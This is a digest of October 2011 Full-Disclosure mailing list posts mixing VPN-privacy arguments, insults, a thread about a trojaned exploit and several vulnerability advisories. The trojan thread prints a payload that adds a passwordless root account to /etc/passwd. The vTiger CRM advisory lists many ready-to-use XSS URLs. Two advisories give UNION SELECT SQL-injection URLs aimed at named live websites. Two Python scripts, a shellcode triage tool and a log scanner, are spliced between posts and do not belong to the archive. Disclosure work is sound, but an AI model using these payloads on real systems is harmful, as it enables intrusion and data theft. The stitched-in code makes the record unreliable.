Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Ferenc Kovacs
http://vpn.hidemyass.com/vpncontrol/legal.html

VPN Data

What we store: Time stamp and IP address when you connect and
disconnect to our service.

...

Legalities

Anonymity services such as ours do not exist to hide people from
illegal activity. We will cooperate with law enforcement agencies if
it has become evident that your account has been used for illegal
activities.

People should read the TOC, AUP and privacy policy, especially if they
are planning to use that service for illegal activities.

As I mentioned before, it is hard to expect that a VPN provider will
risk his company for your $11.52/month; maybe they would try it
for some lesser case, but what LulzSec did was grand, so I'm not
surprised that they bent.

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
and i will find you :)

He obviously has an sshd scanner ready and waiting :)
There is code, though... just NOT that one.
xd


On 4 October 2011 01:54, adam a...@papsy.net wrote:

 /* KEEP PRIV8!! leak and i will find you :) ~ desg */
 Probably should have been a good indication that he *wanted* you to run
 it.


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Antony widmal
Using an external VPN provider to cover your trace clearly shows your
incompetency and your idiotic assumption.
Trying to blame the VPN provider rather than accepting your mistake and
learning from it clearly shows your 3-year-old mentality.

Also, could you please stop posting as GLOW Xd as well?
We do not need your schizophrenic script kiddie "lolololol", "xD", "hugs"
spamming on this mailing list.

You being on this mailing list is once again not the best idea.

Thanks,
Antony

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
maybe they are law abiding companies? :)

Who were advertising themselves, and acting like they would NEVER do the
dirty by handing over any payment records etc... which is half the reason I
believe people use those ones: advertising to protect you, not to give
your info up for really no reason, as they did.
Law abiding or not, then they should be advertising as a law abiding
company, and not acting like some hackers' paradise VPN service.
xd


On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote:

 On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote:
  Actually XD and me are two different people. Second, issues of privacy
  are always relevant; those not understanding that law abiding individuals
  should always be concerned about companies that hand over personal info
  at the request of an authority figure are the ones with three year old
  mentalities.

 Maybe they are law abiding companies? :)
 This whole fuss wouldn't have happened if everybody could just stay a
 law abiding citizen.

 --
 Ferenc Kovács
 @Tyr43l - http://tyrael.hu


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Vincent Degat
/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#


/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

Woot ;)

On Mon, Oct 3, 2011 at 6:32 PM, Laurelai laure...@oneechan.org wrote:

  On 10/3/2011 7:31 AM, Darren Martyn wrote:

 I regularly trawl Pastebin.com to find code - often idiots leave some 0day
 and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check this
 code in a VM? I am not sure if it is legit or not.

 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren



  Pretty sure it's a trojan.





-- 
LPTMS - CNRS - Université Paris-Sud
tel : +33 (0)1 69 15 74 39
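Vincent's decode above reads the payload's intent straight out of the escaped bytes; as an added example (not part of the original post), this Python does the same job statically: it converts a perl-style \xNN blob to bytes, pulls out the printable strings the way strings(1) would, and flags the markers that should keep such a blob confined to a sandbox. SAMPLE_BLOB is constructed: a few filler bytes standing in for the code, followed by the command strings quoted in the thread with the '#' separators the quoted decode shows.

```python
import re

ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Markers whose presence in an unknown blob means: do not run it outside a sandbox.
SUSPICIOUS_MARKERS = ("/etc/passwd", "/etc/shadow", "/bin/sh", "/bin/bash",
                      ":0:0:", "chmod ", "wget ", "curl ")


def unescape(blob):
    """Turn perl/C style text such as "\\x2f\\x62" into the raw bytes it denotes.
    Literal characters between escapes are kept as-is."""
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(blob):
        out += blob[pos:m.start()].encode("latin-1")
        out.append(int(m.group(1), 16))
        pos = m.end()
    out += blob[pos:].encode("latin-1")
    return bytes(out)


def printable_strings(data, min_len=4, separators=b"#\x00"):
    """strings(1)-style: runs of printable ASCII of at least min_len bytes.
    Bytes in `separators` end a run; shellcode commonly carries its argv strings
    joined by a placeholder byte that it overwrites with NUL at run time, and
    the decode quoted above shows '#' in that role."""
    runs, cur = [], bytearray()
    for b in data + b"\x00":          # trailing NUL flushes the last run
        if 0x20 <= b < 0x7F and b not in separators:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs


def triage(blob):
    """Decode, extract strings, and report which suspicious markers they contain."""
    data = unescape(blob)
    strings = printable_strings(data)
    flagged = sorted({mk for s in strings for mk in SUSPICIOUS_MARKERS if mk in s})
    return {"length": len(data), "strings": strings, "flagged": flagged}


# Constructed sample: four filler bytes standing in for the code part, then the
# command strings the thread quotes, '#'-separated, then "AAAABBBB" padding.
SAMPLE_BLOB = (
    r"\x31\xc0\x31\xdb"
    r"\x2f\x62\x69\x6e\x2f\x73\x68\x23"          # "/bin/sh#"
    r"\x2d\x63\x23"                              # "-c#"
    r"/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#"
    r"\x41\x41\x41\x41\x42\x42\x42\x42"          # "AAAABBBB"
)

if __name__ == "__main__":
    report = triage(SAMPLE_BLOB)
    print(f"{report['length']} bytes; strings found:")
    for s in report["strings"]:
        print("  ", s)
    print("flagged markers:", ", ".join(report["flagged"]) or "none")
```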

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
here are places like codepad.org that let you compile/execute various


Indeed, I have seen the codepad.org execute action used on many many bots,
even on pastebin just using download= and renaming the downloaded file :s not
too hard, don't even need to rename the file, and the raw= feature is plain code
just in a txt.
On codepad though, you can actually execute the code on the server, and that's
awesome for debugging I guess, but I prefer to use my own stdinout.
Anyhow, it is a nice world there, that is where half the bots in use sit...
You should find some of the more popular botz, and strings, and watch
how many are active... many would be, believe it. Especially on pastebin and
codepad, those two are best because they allow raw download.. but codepad
even allows you to set up a subdomain, which was removed from pastebin,
unf..
Oh well, that's how it is, it is OK by me.
xd


On 4 October 2011 07:14, adam a...@papsy.net wrote:

 Darren,

 There are places like codepad.org that let you compile/execute various
 programming/scripting languages, of course you don't have the control/access
 that you'd normally have but for some things - it may just be enough.

 On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn 
 d.martyn.fulldisclos...@gmail.com wrote:

 I may have to set up such an RSS + REGEX along with Google Alerts to get
 the best of both :)

 Since my lack of computing facilities has gotten worse in the last month I
 have actually begun to forget ASM, so decoding shellcode is not so easy for
 me :(
 Nor do I have (currently) access to a Linux box to test it on - only a
 friend's W7 laptop (which wants to use Cyrillic) and the college computers
 (W7 also... network booting with Novell, buggy and slow for the win!)

 I will keep on posting anything that looks even mildly interesting, may
 find something fun in my travels :)


 On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly zpamh...@gmail.com wrote:

 OMG!
 This ...
 actually WORKS!
 GR8 Job, m8+!
 L33+ cC l33+
 W00+ FB Bwana!
 ...
 ! connection reseted by peer 

 [[   adam   ]] @ [[   03/10/2011 17:56
 ]]--
  Also, make sure you guys don't miss out on this 0day either:
 http://pastebin.com/R8XdsUgK
 


Re: [Full-disclosure] Netvolution referer header SQL injection vulnerability

2011-10-04 Thread Dimitris Glynos
On 10/03/2011 01:47 PM, Dimitris Glynos wrote:
 As header field values are normally not included in HTTP transaction
 logs, an attack based on this vulnerability may go unnoticed by web
 server administrators.

A correction:

Although most header fields are not normally included in HTTP
transaction logs, the referer one usually is. Hence the above
argument holds true only for web servers with minimal logging
setups (e.g. IIS 6.0 using IIS Log File Format).

Cheers,

Dimitris

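Dimitris's correction above turns on what the access log actually records, so here is an added example (not code from the advisory or from the Netvolution vendor) that scans Apache/nginx combined-format lines for SQL-injection indicators in the Referer field and counts the common-format lines that simply cannot carry one. The log lines are constructed, and the indicator regexes are generic SQL metacharacter patterns rather than the Netvolution payload, which the thread does not show.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: the Referer is the first quoted field after status and size.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# NCSA "common" format has no Referer column at all; a header-borne attack
# leaves nothing to find here (the minimal-logging case the post describes).
COMMON_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Coarse indicators for triage (not blocking): quote + boolean tautology,
# UNION SELECT, quote + SQL comment, stacked query, and time-based probes.
SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\s+\S+\s*=\s*\S+", re.I),
    re.compile(r"union(\s|/\*.*?\*/)+(all\s+)?select", re.I),
    re.compile(r"'\s*(--|#|/\*)"),
    re.compile(r";\s*(drop|insert|update|delete|exec|waitfor)\b", re.I),
    re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
]


def parse_line(line):
    """Return (fields, has_referer); fields is None for lines in neither format."""
    m = COMBINED_RE.match(line)
    if m:
        return m.groupdict(), True
    m = COMMON_RE.match(line)
    if m:
        return m.groupdict(), False
    return None, False


def referer_looks_injected(referer):
    """Percent-decode twice (catches double encoding) and test the indicators."""
    if not referer or referer == "-":
        return False
    decoded = unquote(unquote(referer))
    return any(p.search(decoded) for p in SQLI_PATTERNS)


def scan(lines):
    """Return suspicious (host, time, decoded referer) tuples plus a count of
    lines whose format has no Referer column and so could never reveal the attack."""
    hits, no_referer = [], 0
    for raw in lines:
        fields, has_ref = parse_line(raw.rstrip("\n"))
        if fields is None:
            continue
        if not has_ref:
            no_referer += 1
        elif referer_looks_injected(fields["referer"]):
            hits.append((fields["host"], fields["time"], unquote(fields["referer"])))
    return {"hits": hits, "no_referer_lines": no_referer}


# Constructed sample: one benign combined line, two with injected Referers,
# and one common-format line (same client, same attack, but no Referer logged).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Oct/2011:13:47:01 +0300] "GET /index.php HTTP/1.1" 200 5120 '
    '"http://www.example.com/news" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Oct/2011:13:47:09 +0300] "GET /index.php HTTP/1.1" 200 5120 '
    '"http://evil.example/?x=1%27%20OR%20%271%27=%271" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Oct/2011:13:47:15 +0300] "GET /index.php HTTP/1.1" 500 312 '
    '"http://evil.example/\' UNION SELECT user,pass FROM admins-- " "Mozilla/5.0"',
    '198.51.100.7 - - [03/Oct/2011:13:47:22 +0300] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for host, when, ref in result["hits"]:
        print(f"{host} {when} suspicious Referer: {ref}")
    print(f"{result['no_referer_lines']} line(s) in a format with no Referer column")
```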


Re: [Full-disclosure] Vulnerability in multiple themes for Drupal

2011-10-04 Thread Greg Knaddison
/* Pardon my failure to thread this properly. I just subscribed so
future responses can be threaded properly. */

http://seclists.org/fulldisclosure/2011/Oct/22 reports vulnerabilities
in several themes based on the cumulus.swf file.

That file is not present in those themes in the format distributed
from drupal.org.

For example, http://drupalcode.org/project/danland.git/tree/refs/heads/6.x-3.x
shows there is no cumulus.swf in the danland theme which was one of
the themes listed as vulnerable by mustlive.

Since there is no vulnerability in these themes the Drupal Security
Team will not be making an announcement about them.

Regards,
Greg Knaddison, a member of the Drupal Security Team speaking on my own behalf

-- 
Director Security Services
Skype: greg.knaddison | http://twitter.com/greggles | http://acquia.com



[Full-disclosure] Free Koodhz Initiative

2011-10-04 Thread Turro Sec
Well, you should know that Koodhz is a great guy, a young man with lots of
ideals, and he doesn't deserve to suffer the sentence. Koodhz has contributed
a lot to black hat hacking. Software such as w3af could not have worked without the
active (but quiet) participation of this guy. So we ask you to help us
continue our work so that more people know about this cause and help us free
our friend. For your participation we will send a self-adhesive sticker for
free.

http://freekoodhz.com.ar/

Re: [Full-disclosure] Free Koodhz Initiative

2011-10-04 Thread doc mombasa
Sorry, supporting people retarded enough to get busted is not in this year's
budget..
Try again in 2015


[Full-disclosure] vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities

2011-10-04 Thread YGN Ethical Hacker Group
vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

The vTiger CRM 5.2.1 and lower versions are vulnerable to Cross Site
Scripting. No fixed version has been released as of 2011-10-04.


2. BACKGROUND

vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries.  It has a vibrant community of users driving the product
forward, and contributing to its development.  Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows an attacker
to conduct Cross Site Scripting attacks. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

Tested on 5.2.1


5. PROOF-OF-CONCEPT/EXPLOIT


Cross Site Scripting
==

Browser: IE
---

Parameter:  return_url

/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&return_url=<script>alert(/XSS/)</script>


Parameter: workflow_id

/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'<script>alert(/XSS/)</script>&return_url=1


Browser: ALL
--


Parameter:  action

/phprint.php?module=Home&action=--<script>alert(/xss/)</script>&parenttab=My Home Page<script>alert(0)</script>&jt=


Parameter:  module

/phprint.php?module=--<script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=


Parameter:  closingdate_end

/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'<script>alert(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10


Parameter:  closingdate_start

/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-0189b81'<script>alert(1)</script>&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1


Parameter:  contact_id

/index.php?module=Calendar&action=EditView&return_module=Contacts&return_action=DetailView&activity_mode=Events&return_id=29&contact_id=<script>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing


Parameter:  date_closed

/index.php?module=Potentials&action=ListView&date_closed=2006-01'<script>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&viewname=10


Parameter:  day
Note: Move your mouse over the input text box 'pagenum', 1 of 1

/index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x


Parameter:  month
Note: Move your mouse over the input text box 'pagenum', 1 of 1

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1


Parameter:  owner
Note: Move your mouse over the texts Potential No., Potential Name, etc.

/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewname=10


Parameter:  leadsource

/index.php?module=Potentials&action=ListView&leadsource=--None--'<script>alert(1)</script>&query=true&type=dbrd&viewname=10


Parameter:  mode

/index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1


Parameter:  parent_id

/index.php?module=Calendar&action=EditView&return_module=Leads&return_action=DetailView&activity_mode=Events&return_id=37&parent_id=37<script>alert(/XSS/)</script>&parenttab=Marketin


Parameter:  profile_id

/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=view


Parameter:  query
Note: A campaign named 'test' must exist. Move your mouse over the 'edit' link.

/index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaignname&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_text=test&action=index&parenttab=Marketing&search_cnt=


Parameter:  sales_stage

/index.php?module=Potentials&action=ListView&sales_stage=Prospect'<script>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=10


Parameter:  start
Note: Move your mouse over the 'edit' link.

/index.php?action=ListView&module=Calendar&record=116&viewname=19&start=1371b1%20onmouseover=alert(0)%20a%3db%22&parenttab=My%20Home%20Page


Parameter:  subtab
Note: Move your mouse over the Day, Week, Month, Year


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
You are an idiot.



Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Darren Martyn
Ok, well I suppose we can avoid spamming the list with our off-topic
ramblings and get back to the topic on hand (and behave like adults, which I
assume all of you'se are), and clear up a few things.

VPNs and such can serve as a method to stop people on the local network
from sniffing your connection (assuming a reliable encryption scheme is in
place, and you have not been MITM-ed during the key exchange or whatever -
crypto is NOT my interest!). However, we can reliably assume that the VPN
provider can sniff your connection and compromise your safety per se, and
that they WILL cooperate with Law Enforcement.

Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, as
the VPS provider can simply take over the box. Etc.

TL;DR, VPNs are not as safe as some believe for protecting one's anonymity.
They WILL roll over for LEO and such. Not to mention threats on the LAN
could compromise you, but I do not know much about how that works on the
crypto side (however, if someone wants to enlighten me I would be grateful,
it has piqued my curiosity!)

Also, NOT surprised the provider rolled over in THAT case.

*Footnote for Christian, etc. I apologise for inciting a bit of off-topic
ranting, merely discussing morals, and how they affect people, and how often
people do silly things when their logic/morality is compromised, often by
narcotics and such. But that is for a discussion on morals and the
psychology/sociology of cybercriminals. The ensuing debate about
psychedelics and coding was probably my fault, but hey, people have varied
interests, no? If we are going to act our age (adults, I presume) on this
list, at least display some tolerance for other people's discussions, and keep
the anger off the list.


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Darren Martyn
Adam, thanks for the tip on Codepad, I am very grateful.

Is there actually a non-backdoored variant of said code? I have not seen any
CVE mentioning that exploit, so I was naturally wondering.

Also, pastebin/pastee based bots (those scanner kits especially) are not too
uncommon, I have found more than a few.

I was working on dissecting kanbe.tar.gz from madirish.net when my
hardware vanished, very interesting kit. I have a special place in my
heart for those things, because one can easily find the botnet's owners and
report to their ISP (or whatever) or simply observe it (see how big it is).
During the time after Kingcope's EXIM remote root exploit was released I saw
a few kits appear, the first an energymech mod with a scanner and spreading
exploit, another a self-contained Perl script that spread itself a la worm.
Within the following months more of the kits appeared, including the ones
that have various x and x2 shell scripts that simply pass args and such
to other scripts - fuck ugly things!

I wonder though, when someone will write some kind of serious worm for
*nix servers, some kind of self-propagating, multiple spread/infection
method worm, that infects, roots, and iFrames the whole site with malware
spreading nastiness, along with whatever else the evil f*ckers want roots
for. Something like Scalper except a bit nastier. Will be a fun day for
malware dissection :)


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Christian Sciberras
In my eyes, a couple of off-topic messages are ok, but a train of several
messages in less than an hour is what spam is...
I must admit I was pissed off at that time, and the fact that some people
failed to deal with such discussions appropriately only made it worse.

Next time, launch your own thread for such discussions, so that people can
easily manage/ignore what they don't need, instead of filling up legitimate
threads with crap (imho).

On Tue, Oct 4, 2011 at 11:27 AM, Darren Martyn 
d.martyn.fulldisclos...@gmail.com wrote:

 Ok, well I suppose we can avoid spamming the list with our off-topic
 ramblings and get back to the topic on hand (and behave like adults, which I
 assume all of you'se are), and clear up a few things.

 VPNs and such can serve as a method to stop people on the local network
 from sniffing your connection (assuming a reliable encryption scheme is in
 place, and you have not been MITM-ed during the key exchange or whatever -
 crypto is NOT my interest!). However, we can reliably assume that the VPN
 provider can sniff your connection and compromise your safety per se, and
 that they WILL cooperate with Law Enforcement.

 Even running your own VPN (OpenVPN) on a VPS you purchase is still risky,
 as the VPS provider can simply take over the box. Etc.

 TL;DR, VPNs are not as safe as some believe for protecting one's anonymity.
 They WILL roll over for LEO and such. Not to mention threats on the LAN
 could compromise you, but I do not know much about how that works on the
 crypto side (however, if someone wants to enlighten me I would be grateful,
 it has piqued my curiosity!)

 Also, NOT surprised the provider rolled over in THAT case.

 *footnote for Christian, etc. I apologise for inciting a bit of off-topic
 ranting, merely discussing morals, and how they affect people, and how often
 people do silly things when their logic/morality is compromised, often by
 narcotics and such. But that is for a discussion on morals and the
 psychology/sociology of cybercriminals. The ensuing debate about
 psychedelics and coding was probably my fault, but hey, people have varied
 interests, no? If we are going to act our age (adults, I presume) on this
 list at least display some tolerance for other people's discussions, and keep
 the anger off the list.



Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
Honestly, I don't use VPN, don't know a lot about them, but when a company says
"we will hide you.. come to us..", I guess some people take this as
meaning that they can commit crime, which is obviously not the case... I don't
use VPN, I don't believe in them, I don't need them, and I am NOT Laurelai;
for the final time I will say to that idiotic kid trying to say I am: I do
not speak in "lololo", and anyone who knows me would know I ain't her/him,
whoever it is.
Anyhow, yes, well... I am slowly seeing that obviously appearances can be
very deceiving, but then again, I would not expect to get away with crime
on *any* service nowadays; it is crime after all... and it is on the grander
scale, according to the press even, which pushes it forward even harder..
Anyhow, night time here, sleeping time... but I will wake to a million emails
I guess again :s It is a good topic, but also not an excuse for people to
start putting up free *blah* and such, because some of these cases simply
CANNOT be helped, by law... that's just how it is in some countries; they are
stricter (once arrested) than I guess some other countries are..
Regarding Europe and Arabic areas, and the jails there... I can only say
each case must be looked at very closely, and then maybe see why in each
case the arrest was made, and maybe there is some pattern... (the
press... mainly).
cheers, and g'night,
xd



Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
On the piratebay.org dilemma for ISPs, I found this posted just *now*
(10pm, Australian time)

Belgian ISPs Ordered To Block The Pirate Bay -
http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/

Interesting developments regarding this.. I am using the RSS feed on TF to
keep up with this case; seems it has taken a sharp U-turn!
Heads up!
xd



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread doc mombasa
well here in Denmark they are also blocked
but as in most other places it's a block on DNS level so it's very easy to get
around


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Laurelai
On 10/4/2011 7:36 AM, doc mombasa wrote:
 well here in denmark they are also blocked
 but as most other places it's a block on DNS level so it's very easy
 to get around

It also just tends to increase TPB's traffic in the long run.

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread doc mombasa
there is no such thing as bad publicity (especially for sites like TPB)

2011/10/4 Laurelai laure...@oneechan.org

  On 10/4/2011 7:36 AM, doc mombasa wrote:

 well here in denmark they are also blocked
 but as most other places it's a block on DNS level so it's very easy to get
 around

  It also just tends to increase TPB's traffic in the long run.


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Laurelai Storm
I believe they are supporting it.
On Oct 4, 2011 9:29 AM, Georgi Guninski gunin...@guninski.com wrote:
 On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote:
 What tears? I don't even use those providers.

 What a nice drivel in this thread :)))

 btw, are Anonymous affiliated/supporting the usa protests aka
OccupyWallStreet?

 all the usa needs is a revolution just before they go bankrupt :)

 --
 joro

[Full-disclosure] Canadian ISP Website - SQL Injection Vulnerability

2011-10-04 Thread resea...@vulnerability-lab.com
Title:
==
Canadian ISP Website - SQL Injection Vulnerability


Date:
=
2011-09-23



VL-ID:
=
282


Reference:
==
http://www.vulnerability-lab.com/get_content.php?id=282


Introduction:
=
Canadianisp.ca - Is a wholly owned project of Marc Bissonnette /
InternAlysis.
It was originally created as a joint venture with Bob Carrick of Carrick
Solutions, with sole ownership
transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca
is the only website that allows
you to search for an Internet service provider (Dial-up, ISDN, DSL,
Cable, Satellite, Point to Point, Wireless
and Voice Over IP (VoIP)) anywhere in Canada. Customers can post
reviews, and ISPs submit their own services.
All for free. CanadianISP is also one of the most accurate and most
up-to-date ISP lists on the net. There are
many ISP lists out there, but the vast majority of them (as far as we
have seen and we last searched and looked
in April of 2011) are out of date, listing companies no longer in
business, no longer providing connectivity
or simply pages of ads with no relevance to the users' search parameters.
ISPs can submit and edit / update their own services at all times, free
of charge.

(Copy of the Vendor Homepage: www.canadianisp.ca/about.htm)


Abstract:
=
Vulnerability-Lab Team discovered a critical remote SQL Injection
vulnerability on the Canadian ISP main vendor website.


Report-Timeline:

2011-09-24: Vendor Notification
2011-10-03: Vendor Response/Feedback
2011-10-04: Vendor Fix/Patch
2011-10-04: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Canadian ISP Website - 2011/Q2-3


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL injection vulnerability is detected on the Canadian ISP website. The
bug allows remote attackers to inject/execute
their own SQL statements/commands over a vulnerable application parameter on
the main web service. Successful exploitation
of the remote SQL injection vulnerability can result in database
management system compromise & website manipulations.

Vulnerable Module(s):
[+] ispsearch.cgi

Vulnerable Param(s):
[+] ispid


Pictures:
../1.png


Proof of Concept:
=
The vulnerability can be exploited by remote attackers without user
interaction. For demonstration or reproduce ...

<html>
<head>
<title>Remote SQL Injection PoC - CANADIAN ISP</title>
</head>
<body>
<iframe
src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetailispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,
101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,
135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,
169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,
203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,
237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,
271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,
305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,
339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,
373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,
407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,
441,442,443,444,445,446,447--
></iframe><br><br>
</body>
</html>


Risk:
=
The security risk of the remote sql injection vulnerability is estimated
as critical.


Credits:

Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN]


Disclaimer:
===
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential 

[Full-disclosure] Prosieben Website - Multiple SQL Injection Vulnerabilities

2011-10-04 Thread resea...@vulnerability-lab.com
Title:
==
Prosieben Web Services - Multiple SQL Injection Vulnerabilities


Date:
=
2011-09-26



VL-ID:
=
284


Abstract:
=
The Vulnerability Lab Research Team discovered multiple remote SQL
injection vulnerabilities on Prosieben's tvtotal vendor website.


Report-Timeline:

2011-09-01:Vendor Fix/Patch
2011-10-04:Public or Non-Public Disclosure  [FULL RELEASE]


Status:

Unpublished


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple remote SQL injection vulnerabilities are detected on Prosieben's
Tvtotal vendor website.
Remote attackers can inject/execute their own SQL statements over the
vulnerable modules on the affected DBMS.
Successful exploitation can result in server & database management
system compromise.

Vulnerable Module(s):
[+] Player - Index
[+] Videos Listing
[+] Community Profiles

Vulnerable Param(s):
[+] ?list=tag&tag=stefan_raab&tagId=
[+] ?contentId=
[+] ?u=

Pictures:
../1.png
../2.png
../


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers. For
demonstration or reproduce ...

1.1

URL:http://tvtotal.prosieben.de
PATH:/tvtotal/videos/player/
File:index.html
Para:?contentId=

http://tvtotal.prosieben.de/tvtotal/videos/player/index.html?contentId=-42136+union+select+1,2,3,4,5,6,
